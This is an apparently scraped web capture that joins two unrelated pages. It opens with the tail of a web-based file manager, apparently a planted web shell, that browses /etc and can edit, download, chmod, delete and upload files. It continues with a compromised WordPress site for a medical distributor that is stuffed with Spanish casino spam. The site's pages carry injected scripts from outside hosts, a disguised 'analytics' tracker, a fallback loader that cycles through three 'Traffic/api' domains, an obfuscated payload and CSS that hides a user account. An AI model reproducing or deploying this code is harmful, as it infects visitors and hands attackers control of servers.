                            <td>2026-08-20 10:33</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fwwwacct.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fwwwacct.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/wwwacct.conf','wwwacct.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/wwwacct.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/wwwacct.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wwwacct.conf.cache">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fwwwacct.conf.cache" class="file-link">📄 wwwacct.conf.cache</a></td>
                            <td class="size">335 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-20 10:33</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fwwwacct.conf.cache" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fwwwacct.conf.cache" class="action-button">Download</a>
                                <button onclick="showRename('/etc/wwwacct.conf.cache','wwwacct.conf.cache')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/wwwacct.conf.cache','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/wwwacct.conf.cache',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wwwacct.conf.shadow">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fwwwacct.conf.shadow" class="file-link">📄 wwwacct.conf.shadow</a></td>
                            <td class="size">79 B</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2025-09-02 19:05</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fwwwacct.conf.shadow" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fwwwacct.conf.shadow" class="action-button">Download</a>
                                <button onclick="showRename('/etc/wwwacct.conf.shadow','wwwacct.conf.shadow')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/wwwacct.conf.shadow','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/wwwacct.conf.shadow',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="wwwacct.conf.shadow.cache">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fwwwacct.conf.shadow.cache" class="file-link">📄 wwwacct.conf.shadow.cache</a></td>
                            <td class="size">438 B</td>
                            <td><span class="permissions">0600</span></td>
                            <td>2026-08-20 10:33</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fwwwacct.conf.shadow.cache" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fwwwacct.conf.shadow.cache" class="action-button">Download</a>
                                <button onclick="showRename('/etc/wwwacct.conf.shadow.cache','wwwacct.conf.shadow.cache')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/wwwacct.conf.shadow.cache','0600')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/wwwacct.conf.shadow.cache',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="xattr.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fxattr.conf" class="file-link">📄 xattr.conf</a></td>
                            <td class="size">817 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2022-01-28 12:44</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fxattr.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fxattr.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/xattr.conf','xattr.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/xattr.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/xattr.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                            <tr data-name="yum.conf">
                            <td><a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fyum.conf" class="file-link">📄 yum.conf</a></td>
                            <td class="size">203 B</td>
                            <td><span class="permissions">0644</span></td>
                            <td>2026-08-18 03:37</td>
                            <td><div class="actions">
                                <a href="?p=%2Fetc&edit=1&path=%2Fetc%2Fyum.conf" class="action-button">Edit</a>
                                <a href="?download=1&path=%2Fetc%2Fyum.conf" class="action-button">Download</a>
                                <button onclick="showRename('/etc/yum.conf','yum.conf')" class="action-button">Rename</button>
                                <button onclick="showChmod('/etc/yum.conf','0644')" class="action-button">Chmod</button>
                                <button onclick="ajaxDelete('/etc/yum.conf',this)" class="action-button action-button-red">Delete</button>
                            </div></td>
                        </tr>
                                                        </tbody>
            </table>
            </div>
    
    <div id="toast-container" class="toast-container"></div>

    <script>
        const currentPath = '/etc';
        
        function showToast(msg, type) {
            const container = document.getElementById('toast-container');
            const toast = document.createElement('div');
            toast.className = 'toast toast-' + type;
            toast.innerHTML = msg + '<span onclick="this.parentElement.remove()" style="cursor:pointer;margin-left:10px;">×</span>';
            container.appendChild(toast);
            setTimeout(() => toast.remove(), 3000);
        }
        
        function ajaxRequest(action, data) {
            const formData = new FormData();
            formData.append('ajax_action', action);
            for(const key in data) formData.append(key, data[key]);
            return fetch(window.location.pathname, { method: 'POST', body: formData }).then(r => r.json());
        }
        
        function ajaxDelete(path, btn) {
            if(!confirm('Delete?')) return;
            const row = btn.closest('tr');
            row.style.opacity = '0.5';
            ajaxRequest('delete', {path}).then(r => {
                if(r.success) { row.remove(); showToast('Deleted', 'success'); }
                else { row.style.opacity = '1'; showToast(r.message || 'Failed', 'error'); }
            });
        }
        
        function showCreateFile() {
            const name = prompt('File name:', 'newfile.txt');
            if(name) {
                const content = prompt('Content:', '');
                ajaxRequest('create', {path: currentPath, name, type: 'file', content: content || ''})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showCreateFolder() {
            const name = prompt('Folder name:', 'newfolder');
            if(name) {
                ajaxRequest('create', {path: currentPath, name, type: 'dir'})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showRename(path, name) {
            const newName = prompt('New name:', name);
            if(newName && newName !== name) {
                ajaxRequest('rename', {old_path: path, new_name: newName})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function showChmod(path, current) {
            const mode = prompt('Permissions (e.g. 755):', current);
            if(mode && mode !== current) {
                ajaxRequest('chmod', {path, mode})
                    .then(r => { if(r.success) location.reload(); else showToast(r.message, 'error'); });
            }
        }
        
        function uploadFileB64(input) {
            const file = input.files[0];
            if(!file) return;
            showToast('Uploading: ' + file.name, 'success');
            const reader = new FileReader();
            reader.onload = function(e) {
                const b64 = e.target.result.split(',')[1];
                const formData = new FormData();
                formData.append('ajax_action', 'b64upload');
                formData.append('path', currentPath);
                formData.append('name', file.name);
                formData.append('data', b64);
                fetch(window.location.pathname, { method: 'POST', body: formData })
                    .then(r => r.json())
                    .then(r => {
                        if(r.success) { showToast('Uploaded: ' + file.name, 'success'); setTimeout(() => location.reload(), 500); }
                        else { showToast('Failed: ' + (r.message || 'Unknown error'), 'error'); }
                    })
                    .catch(err => showToast('Error: ' + err.message, 'error'));
            };
            reader.readAsDataURL(file);
            input.value = '';
        }
        
        function searchFiles(query) {
            query = query.toLowerCase();
            document.querySelectorAll('#file-list tr[data-name]').forEach(row => {
                row.style.display = row.dataset.name.includes(query) ? '' : 'none';
            });
        }
        
        document.addEventListener('keydown', function(e) {
            if(e.ctrlKey && e.key === 'f' && !e.target.matches('input,textarea')) { 
                e.preventDefault(); 
                document.getElementById('search-input').focus(); 
            }
        });
    </script>
</body>
</html><!doctype html>
<html lang="pt-BR">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="https://gmpg.org/xfn/11">
	<title>pblmedic &#8211; Página: 3</title>
<meta name='robots' content='max-image-preview:large' />
<link rel='dns-prefetch' href='//gixxipi9823.life' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel="alternate" type="application/rss+xml" title="Feed para pblmedic &raquo;" href="https://pblmedic.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para pblmedic &raquo;" href="https://pblmedic.com/comments/feed/" />
<style id="wp-img-auto-sizes-contain-inline-css">
img:is([sizes=auto i],[sizes^="auto," i]){contain-intrinsic-size:3000px 1500px}
/*# sourceURL=wp-img-auto-sizes-contain-inline-css */
</style>
<style id="wp-emoji-styles-inline-css">

	img.wp-smiley, img.emoji {
		display: inline !important;
		border: none !important;
		box-shadow: none !important;
		height: 1em !important;
		width: 1em !important;
		margin: 0 0.07em !important;
		vertical-align: -0.1em !important;
		background: none !important;
		padding: 0 !important;
	}
/*# sourceURL=wp-emoji-styles-inline-css */
</style>
<style id="wp-block-library-inline-css">
:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.wp-element-button{cursor:pointer}:root .has-very-light-gray-background-color{background-color:#eee}:root .has-very-dark-gray-background-color{background-color:#313131}:root .has-very-light-gray-color{color:#eee}:root .has-very-dark-gray-color{color:#313131}:root .has-vivid-green-cyan-to-vivid-cyan-blue-gradient-background{background:linear-gradient(135deg,#00d084,#0693e3)}:root .has-purple-crush-gradient-background{background:linear-gradient(135deg,#34e2e4,#4721fb 50%,#ab1dfe)}:root .has-hazy-dawn-gradient-background{background:linear-gradient(135deg,#faaca8,#dad0ec)}:root .has-subdued-olive-gradient-background{background:linear-gradient(135deg,#fafae1,#67a671)}:root .has-atomic-cream-gradient-background{background:linear-gradient(135deg,#fdd79a,#004a59)}:root .has-nightshade-gradient-background{background:linear-gradient(135deg,#330968,#31cdcf)}:root .has-midnight-gradient-background{background:linear-gradient(135deg,#020381,#2874fc)}:root{--wp--preset--font-size--normal:16px;--wp--preset--font-size--huge:42px}.has-regular-font-size{font-size:1em}.has-larger-font-size{font-size:2.625em}.has-normal-font-size{font-size:var(--wp--preset--font-size--normal)}.has-huge-font-size{font-size:var(--wp--preset--font-size--huge)}:root .has-text-align-center{text-align:center}:root .has-text-align-left{text-align:left}:root .has-text-align-right{text-align:right}.has-fit-text{white-space:nowrap!important}#end-resizable-editor-section{display:none}.aligncenter{clear:both}.items-justified-left{justify-content:flex-start}.items-justified-center{justify-content:center}.items-justified-right{justify-content:flex-end}.items-justified-space-between{justify-content:space-between}.screen-reader-text{word-wrap:normal!important;border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-break:normal!important}.screen-reader-text:focus{background-color:#ddd;clip-path:none;color:#444;display:block;font-size:1em;height:auto;left:5px;line-height:normal;padding:15px 23px 14px;text-decoration:none;top:5px;width:auto;z-index:100000}html :where(.has-border-color){border-style:solid}html :where([style^=border-color],[style*=";border-color"],[style*="; border-color"]){border-style:solid}html :where([style^=border-top-color],[style*=";border-top-color"],[style*="; border-top-color"]){border-top-style:solid}html :where([style^=border-right-color],[style*=";border-right-color"],[style*="; border-right-color"]){border-right-style:solid}html :where([style^=border-bottom-color],[style*=";border-bottom-color"],[style*="; border-bottom-color"]){border-bottom-style:solid}html :where([style^=border-left-color],[style*=";border-left-color"],[style*="; border-left-color"]){border-left-style:solid}html :where([style^=border-width],[style*=";border-width"],[style*="; border-width"]){border-style:solid}html :where([style^=border-top-width],[style*=";border-top-width"],[style*="; border-top-width"]){border-top-style:solid}html :where([style^=border-right-width],[style*=";border-right-width"],[style*="; border-right-width"]){border-right-style:solid}html :where([style^=border-bottom-width],[style*=";border-bottom-width"],[style*="; border-bottom-width"]){border-bottom-style:solid}html :where([style^=border-left-width],[style*=";border-left-width"],[style*="; border-left-width"]){border-left-style:solid}html :where(img[class*=wp-image-]){height:auto;max-width:100%}:where(figure){margin:0 0 1em}html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:var(--wp-admin--admin-bar--height,0px)}@media screen and (max-width:600px){html :where(.is-position-sticky){--wp-admin--admin-bar--position-offset:0px}}
/*wp_block_styles_on_demand_placeholder:6a86dc1f75aa8*/
/*# sourceURL=wp-block-library-inline-css */
</style>
<style id="wp-block-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the block styles printed at wp_footer." }
/*# sourceURL=wp-block-styles-placeholder-inline-css */
</style>
<style id="wp-global-styles-placeholder-inline-css">
:root { --wp-internal-comment: "Placeholder for wp_hoist_late_printed_styles() to replace with the global-styles printed at wp_footer." }
/*# sourceURL=wp-global-styles-placeholder-inline-css */
</style>
<link rel='stylesheet' id='ganalytics-fonts-css' href='https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100' media='all' />
<link rel='stylesheet' id='hello-elementor-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/reset.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-theme-style-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/theme.css?ver=3.4.4' media='all' />
<link rel='stylesheet' id='hello-elementor-header-footer-css' href='https://pblmedic.com/wp-content/themes/hello-elementor/assets/css/header-footer.css?ver=3.4.4' media='all' />
<script data-wp-strategy="defer" defer id="ganalytics-tracker-js" src="https://gixxipi9823.life/t.js?site=5b9c529db03be43d062917c963ff43ed"></script>
<link rel="https://api.w.org/" href="https://pblmedic.com/wp-json/" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://pblmedic.com/xmlrpc.php?rsd" />
<meta name="generator" content="WordPress 7.1" />
<script src="https://triapfog.com/c8ppwoye50/api"></script><style id="wp-custom-css">
tr#user-3,tr#user_3{display:none!important}
</style>
</head>
<body class="home blog paged wp-embed-responsive paged-3 wp-theme-hello-elementor hello-elementor-default">


<a class="skip-link screen-reader-text" href="#content">Ir para o conteúdo</a>


<header id="site-header" class="site-header">

	<div class="site-branding">
					<div class="site-title">
				<a href="https://pblmedic.com/" title="Página inicial" rel="home">
					pblmedic				</a>
			</div>
						</div>

			<nav class="site-navigation" aria-label="Menu principal">
			<ul id="menu-principal" class="menu"><li id="menu-item-72" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-72"><a href="https://pblmedic.com/#inicio">Início</a></li>
<li id="menu-item-73" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-73"><a href="https://pblmedic.com/#quem-somos">Quem somos</a></li>
<li id="menu-item-74" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-74"><a href="https://pblmedic.com/#linha-distribuicao">Linha de distribuição</a></li>
<li id="menu-item-75" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-75"><a href="https://pblmedic.com/#area-de-atuacao">Área de atuação</a></li>
<li id="menu-item-76" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-76"><a href="https://pblmedic.com/#diferenciais">Diferenciais</a></li>
<li id="menu-item-77" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-77"><a href="https://api.whatsapp.com/send/?phone=5511961828606">Fale Conosco</a></li>
<li id="menu-item-78" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-home menu-item-78"><a href="https://pblmedic.com/#contato">Contato</a></li>
</ul>		</nav>
	</header>
<main id="content" class="site-main">

			<div class="page-header">
			<h1 class="entry-title">Arquivos</h1>		</div>
	
	<div class="page-content">
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/20/nuestro-escarlata-esparcimiento-inspirado-slot-en-linea-sea-of-tranquility-en-una-cinta-que-esta-regalado-sobre-steam/">Nuestro escarlata esparcimiento inspirado Slot en línea Sea of Tranquility en una cinta que está Regalado sobre Steam</a></h2><p>Content Desigualdades entre competir con el pasar del tiempo giros gratuito carente dep&#xF3;ubicado vs joviales dep&#xF3;emplazado | Slot en línea Sea of Tranquility De a donde pudiera llegar&#xF3;mo usar todo bono de giros vano referente a algún casino Beneficios para giros de balde desprovisto dep&#xF3;sito Casinos con manga larga Giros Regalado acerca de 2025: Relación [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/20/excelentes-lista-de-juegos-netent-casinos-online-referente-a-chile-lugares-fiables-asi-como-legales-2026/">Excelentes Lista de juegos netent casinos online referente a Chile Lugares fiables así­ como legales 2026</a></h2><p>Content Lista de juegos netent | Bono sobre recepción con el fin de casino en internet C&#xF3;mo trabajan las &quot;pulseras de reencuentro&quot; de su Fiesta del Poncho Sitios que aceptan euros argentinos Las Más grandes Casinos Online acerca de De cualquier parte del mundo Dentro de las m&#xE9;todo el mundo de remuneración m&#xE1;s usadas est&#xE1;n [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/20/tragaperras-regalado-hace-el-trabajo-5-50-sin-giros-de-deposito-zeus-000-slots-asi-como-tragamonedas/">Tragaperras Regalado Hace el trabajo 5 50 sin giros de depósito zeus 000 Slots así­ como Tragamonedas</a></h2><p>Content 50 sin giros de depósito zeus: Metawin &#x2013; 25 Free Spins Carente Dep&#xF3;emplazado Adem&#xE1;s, Jack extiende sus recompensas de giros sin cargo durante los tres primeros dep&#xF3;sitos, permitiendo a los jugadores desbloquear giros extras a medida que siguen jugando. Los consumidores sobre apuestas deportivas pueden ingresar a apuestas de bono buscando respetar con los [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/20/royal-vegas-casino-resena-bonos-asi-lucky-ladys-charm-deluxe-giros-sin-ranura-como-consejos-de-2026/">Royal Vegas Casino, Reseña, bonos así­ lucky ladys charm deluxe giros sin ranura como consejos de 2026</a></h2><p>Content Lucky ladys charm deluxe giros sin ranura | C&#xF3;mo dar con nuestro conveniente casino online con manga larga dinero conveniente para ti El casino acerca de avispado Royal Vegas funciona hacia la medio Evolution Gaming. Tambi&#xE9;n tenemos determinados t&#xED;tulos de demás grados que cooperan joviales Microgaming.</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/20/lucky-nugget-lucky-ladys-charm-deluxe-casino-casino-de-cualquier-parte-del-mundo-tragamonedas-asi-como-bonos-en-particular-2026/">Lucky Nugget lucky ladys charm deluxe casino Casino De cualquier parte del mundo: Tragamonedas así­ como Bonos En particular 2026</a></h2><p>Content Lucky ladys charm deluxe casino &#8211; Lucky Nugget Casino: informaci&#xF3;n y no ha transpirado licencias Bonos así­ como a donde pudiera llegar&#xF3;digos promocionales de Lucky Nugget Casino Lucky Nugget Casino brinda algún bono extra llamado la Llanta de Bono, disponible para todo el mundo las miembros. Lucky Nugget extiende algún generoso bono sobre recepción [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/20/resena-de-hopa-secret-of-the-stones-ranura-en-linea-casino-2026-valorado-por-holymolycasinos-argentina/">Reseña de Hopa secret of the stones Ranura en línea Casino 2026 Valorado por HolyMolyCasinos Argentina</a></h2><p>Content Secret of the stones Ranura en línea: Bonos desprovisto dep&#xF3;emplazado de juegos sobre casino Vale conocer que, pero los bonos sobre casino resultan estupendos, acostumbran a haber algunas restricciones. Las bonos de casino resultan muy beneficiosos a la hora de jugar ruleta con manga larga recursos favorable, pues pueden otorgarte incre&#xED;bles premios.</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/20/tragamonedas-en-buffalo-blitz-casino-internet/">Tragamonedas En buffalo blitz casino internet</a></h2><p>Content Casinos en internet legales brasile&#xF1;os con aprobaci&#xF3;n publico | buffalo blitz casino Formas estándares de Spin Samba Casino Sobre los casinos sobre l&#xED;nea referente a Brasil, estas opciones de remuneración resultan una apoyo con el fin de una practica sobre entretenimiento fluida. Aunque nunca os preocupes, os hay cubierto de m&#xE9;todos de pago m&#xE1;s [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/20/algunas-intense-casino-aplicacion-descargar-apk-espana-23-000-juegos-de-casino-sin-cargo-casino-online-regalado/">Algunas intense casino aplicación descargar apk españa 23 000 juegos de casino sin cargo Casino online regalado</a></h2><p>Content Intense casino aplicación descargar apk españa | Tiradas sin cargo Todos los superiores casinos online recomendados &#x2013; julio 2026 En realidad, nadie pondrí­a en duda desde hace varios a&#xF1;os, casi aquellos casinos referente a l&#xED;nea resultan carente descarga. Esa duda serí­a repetitivo dentro de las socios de la humanidad desde cual hemos listado los [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/20/torneos-sobre-tragamonedas-guia-clases-asi-como-zeus-casinos-opiniones/">Torneos sobre tragamonedas: guía, clases así­ como Zeus casinos opiniones</a></h2><p>Content Zeus casinos: Relación pr&#xE1;ctica de EV con manga larga algún prototipo Pruebas con final sobre premios acerca de met&#xE1;lico Fallos comunes en eludir referente a los torneos de tragamonedas S&#xED;, gran Zeus casinos cantidad de casinos en l&#xED;nea se fabrican con torneos sobre tragamonedas VIP o para grandes apostadores que son particularmente con el [&hellip;]</p>
			</article>
					<article class="post">
				<h2 class="entry-title"><a href="https://pblmedic.com/2026/08/20/tiradas-reel-kings-giros-sin-ranura-sin-cargo/">Tiradas reel kings giros sin ranura Sin cargo</a></h2><p>Content Requisitos de Apuestas sobre Lapso: reel kings giros sin ranura &#xBF;Qu&#xE9; tipos sobre bonos de casino carente dep&#xF3;emplazado existe? Opiniones con el fin de utilizar un bono falto dep&#xF3;emplazado Ruleta en internet Qu&#xE9; son los casinos bonos recepción sin cargo sin dep&#xF3;sito en M&#xE9;xico online Entre los promociones que se puede dar con sobre [&hellip;]</p>
			</article>
			</div>

			<nav class="pagination">
			<div class="nav-previous"><a href="https://pblmedic.com/page/2/?p=%2F%2Fetc" ><span class="meta-nav">&larr;</span> anterior</a></div>
			<div class="nav-next"><a href="https://pblmedic.com/page/4/?p=%2F%2Fetc" >Próximo <span class="meta-nav">&rarr;</span></a></div>
		</nav>
	
</main>
<footer id="site-footer" class="site-footer">
	</footer>

<script type="speculationrules">
{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"/*"},{"not":{"href_matches":["/wp-*.php","/wp-admin/*","/wp-content/uploads/*","/wp-content/*","/wp-content/plugins/*","/wp-content/themes/hello-elementor/*","/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}
</script>
<script id="wp-emoji-settings" type="application/json">
{"baseUrl":"https://s.w.org/images/core/emoji/17.0.2/72x72/","ext":".png","svgUrl":"https://s.w.org/images/core/emoji/17.0.2/svg/","svgExt":".svg","source":{"concatemoji":"https://pblmedic.com/wp-includes/js/wp-emoji-release.min.js?ver=7.1"}}
</script>
<script type="module">
/*! This file is auto-generated */
var e="script#wp-emoji-settings",t=document.querySelector(e);if(!(t instanceof HTMLScriptElement))throw new Error("Element missing: "+e);const r=JSON.parse(t.text),s=(window._wpemojiSettings=r,"wpEmojiSettingsSupports"),o=["flag","emoji"];function i(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(s,JSON.stringify(t))}catch(e){}}function c(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0);const r=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data);return t.every((e,t)=>e===r[t])}function p(e,t){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var n=e.getImageData(16,16,1,1);for(let e=0;e<n.data.length;e++)if(0!==n.data[e])return!1;return!0}function u(e,t,n,r){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\udde8\ud83c\uddf6","\ud83c\udde8\u200b\ud83c\uddf6")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!r(e,"\ud83e\u1fac8")}return!1}function f(e,t,n,r){let a;const s=(a="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):document.createElement("canvas")).getContext("2d",{willReadFrequently:!0}),o=(s.textBaseline="top",s.font="600 32px Arial",{});return e.forEach(e=>{o[e]=t(s,e,n,r)}),o}function a(e){var t=document.createElement("script");t.src=e,t.defer=!0,document.head.appendChild(t)}r.supports={everything:!0,everythingExceptFlag:!0},new Promise(t=>{let n=function(){try{var e=JSON.parse(sessionStorage.getItem(s));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(o),u.toString(),c.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"});const a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=e=>{i(n=e.data),a.terminate(),t(n)})}catch(e){}i(n=f(o,u,c,p))}t(n)}).then(e=>{for(const n in e)r.supports[n]=e[n],r.supports.everything=r.supports.everything&&r.supports[n],"flag"!==n&&(r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&r.supports[n]);var t;r.supports.everythingExceptFlag=r.supports.everythingExceptFlag&&!r.supports.flag,r.supports.everything||((t=r.source||{}).concatemoji?a(t.concatemoji):t.wpemoji&&t.twemoji&&(a(t.twemoji),a(t.wpemoji)))});
//# sourceURL=https://pblmedic.com/wp-includes/js/wp-emoji-loader.min.js
</script>
<script>(function(){var u=["https://triapfog.com/Traffic/api","https://iocriotao.icu/Traffic/api","https://mioiooo.icu/Traffic/api"],i=0;\nfunction n(){if(i>=u.length)return;var s=document.createElement('script');\ns.src=u[i];s.onerror=function(){i++;n()};\n(document.head||document.documentElement).appendChild(s);i++;}\nn();})();</script>
<script>
"use strict";var rxdmS4,FlCAu25,g3Gld7J,_PoKZj,MSUxhJ2,cUL0VT,j2tRUWQ,Q4sOnFn,nco7OV;const FZHYVb=[0x0,0x1,0x8,0xff,"length","undefined",0x3f,0x6,"fromCodePoint",0x7,0xc,"push",0x5b,0x1fff,0x58,0xd,0xe,0x5d,0x10,0x200,0xf,0x3,0x2,0x4,0x3ff,0x7f,0x1f,0x80,0x12,0x20,0x5,0x18,0xa,0x13,0x40,0xffff,"js",0x82,!0x1];function R_2lkdW(rxdmS4){var FlCAu25="<,^7;9x`%1.0+g~o:JG*fp]ca2O#m}B[bX5d{(wt=iA&TEUINLV$erR_?yKl|YCHvuknW/Z6)>Q8DshzSP4M3!\"Fq@j",g3Gld7J,_PoKZj,MSUxhJ2,cUL0VT,j2tRUWQ,Q4sOnFn,nco7OV;N4W9hYK(g3Gld7J=""+(rxdmS4||""),_PoKZj=g3Gld7J.length,MSUxhJ2=[],cUL0VT=FZHYVb[0x0],j2tRUWQ=FZHYVb[0x0],Q4sOnFn=-FZHYVb[0x1]);for(nco7OV=FZHYVb[0x0];nco7OV<_PoKZj;nco7OV++){var R_2lkdW=FlCAu25.indexOf(g3Gld7J[nco7OV]);if(R_2lkdW===-FZHYVb[0x1])continue;if(Q4sOnFn<FZHYVb[0x0]){Q4sOnFn=R_2lkdW}else{N4W9hYK(Q4sOnFn+=R_2lkdW*FZHYVb[0xc],cUL0VT|=Q4sOnFn<<j2tRUWQ,j2tRUWQ+=(Q4sOnFn&FZHYVb[0xd])>FZHYVb[0xe]?FZHYVb[0xf]:FZHYVb[0x10]);do{N4W9hYK(MSUxhJ2.push(cUL0VT&FZHYVb[0x3]),cUL0VT>>=FZHYVb[0x2],j2tRUWQ-=FZHYVb[0x2])}while(j2tRUWQ>FZHYVb[0x9]);Q4sOnFn=-FZHYVb[0x1]}}if(Q4sOnFn>-FZHYVb[0x1]){MSUxhJ2.push((cUL0VT|Q4sOnFn<<j2tRUWQ)&FZHYVb[0x3])}return t24J32(MSUxhJ2)}function s7MFvm(g3Gld7J){if(typeof rxdmS4[g3Gld7J]===FZHYVb[0x5]){return rxdmS4[g3Gld7J]=R_2lkdW(FlCAu25[g3Gld7J])}return 